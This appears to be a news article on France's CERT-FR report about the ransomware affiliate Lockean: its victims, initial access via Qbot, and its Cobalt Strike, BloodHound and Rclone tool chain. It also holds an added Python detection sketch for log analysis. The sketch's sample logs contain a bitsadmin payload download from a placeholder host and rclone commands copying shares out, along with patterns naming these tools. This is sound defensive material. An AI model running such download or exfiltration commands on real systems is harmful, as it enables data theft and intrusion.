A report from France’s Computer Emergency Response Team (CERT-FR) has revealed details about the tools and techniques employed by a ransomware affiliate group known as Lockean.
The threat actor has infiltrated the networks of at least eight French firms over the last year and a half, collecting data and installing malware from numerous ransomware-as-a-service (RaaS) operations.
Lockean’s operation was first spotted in 2020 when the actor targeted a manufacturing organization in France and installed the DoppelPaymer ransomware on their network.
Between June 2020 and March 2021, Lockean targeted at least seven more firms using several other ransomware families: Maze, ProLock, Egregor, and REvil.
Transport firm Gefco, newspaper Ouest-France, and pharmaceutical companies Fareva and Pierre Fabre are among the enterprises that have been hacked.
Four other enterprises, which CERT-FR did not name, were identified as Lockean victims based on notifications to ANSSI, France’s national cybersecurity agency, and on two cases documented by the private firms Intrinsec and The DFIR Report.
In most attacks outlined in the report, the malicious actor initially accessed the victim’s network via Qbot/QakBot, a banking trojan that morphed into a malware distributor, spreading ransomware variants such as ProLock, Egregor, and DoppelPaymer.
Qbot was distributed by emails from the now-defunct Emotet botnet and a lesser-known malware distribution service known as TA551, also known as Shathak, Gold Cabin, and UNC2420.
In at least one confirmed case, Lockean gained network access through the IcedID malware distribution service instead. Once inside, the threat actor used the Cobalt Strike post-exploitation framework together with the freely available AdFind, BloodHound, and BITSadmin tools for reconnaissance and lateral movement.
According to the research, Lockean received 70% of the ransoms, with the remaining 30% going to the RaaS maintainers. The actor used a double-extortion scheme to maximize profit, stealing data from the victim (using the Rclone tool) before encrypting the devices.
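The report’s tool chain (AD reconnaissance with AdFind/BloodHound, BITSadmin transfers, Rclone exfiltration ahead of encryption) as a detection sketch over process-creation logs. This is an added example, not code from CERT-FR or any of the firms named above; the pipe-delimited log format, host names, and command lines are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation records: "timestamp|host|command line". Not from the report.
SAMPLE_LOGS = [
    "2021-02-10T08:01:12Z|WS-042|C:\\Windows\\System32\\cmd.exe /c whoami",
    "2021-02-10T08:05:40Z|WS-042|C:\\Temp\\adfind.exe -f objectcategory=computer -csv",
    "2021-02-10T08:07:03Z|WS-042|C:\\Temp\\SharpHound.exe -c All --zipfilename ad.zip",
    "2021-02-10T09:15:22Z|SRV-01|bitsadmin /transfer job1 http://example.invalid/x.bin C:\\ProgramData\\x.bin",
    "2021-02-11T22:40:09Z|SRV-01|C:\\ProgramData\\rclone.exe copy D:\\Shares remote:backup --transfers 8",
    "2021-02-11T23:00:00Z|WS-100|C:\\Program Files\\Backup\\rclone.exe sync C:\\Users remote:corp",
]

# Stages of the chain the report describes, keyed by each tool's command-line fingerprint.
STAGE_PATTERNS = {
    "ad_recon": re.compile(r"\b(adfind|sharphound|bloodhound)(\.exe)?\b", re.I),
    "transfer": re.compile(r"\bbitsadmin(\.exe)?\b.*\s/transfer\b", re.I),
    "exfil": re.compile(r"\brclone(\.exe)?\b\s+(copy|sync|move)\b", re.I),
}

def classify(cmdline):
    """Return the stage name a command line matches, or None if it matches nothing."""
    for stage, pattern in STAGE_PATTERNS.items():
        if pattern.search(cmdline):
            return stage
    return None

def stages_by_host(lines):
    """Parse the records and return {host: [(timestamp, stage), ...]} in log order."""
    hits = defaultdict(list)
    for line in lines:
        ts, host, cmdline = line.split("|", 2)
        stage = classify(cmdline)
        if stage:
            hits[host].append((ts, stage))
    return hits

def double_extortion_hosts(lines):
    """Hosts where an Rclone copy followed AD recon or a BITS transfer on the same machine.

    A lone rclone run (WS-100 above) is left alone: it may be a legitimate backup job.
    The preceding recon or transfer stage is what makes the exfiltration suspicious.
    """
    flagged = []
    for host, events in stages_by_host(lines).items():
        seen = set()
        for _, stage in sorted(events):
            if stage == "exfil" and seen & {"ad_recon", "transfer"}:
                flagged.append(host)
                break
            seen.add(stage)
    return flagged
```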
Victims were more willing to pay a negotiated ransom if they were threatened with a data breach, which had more severe privacy and legal ramifications.
Valery Marchive of LeMagIT spotted multiple IP addresses associated with Conti ransomware among the report’s indicators of compromise, suggesting that Lockean works with additional RaaS operations and targets organizations in other regions as well.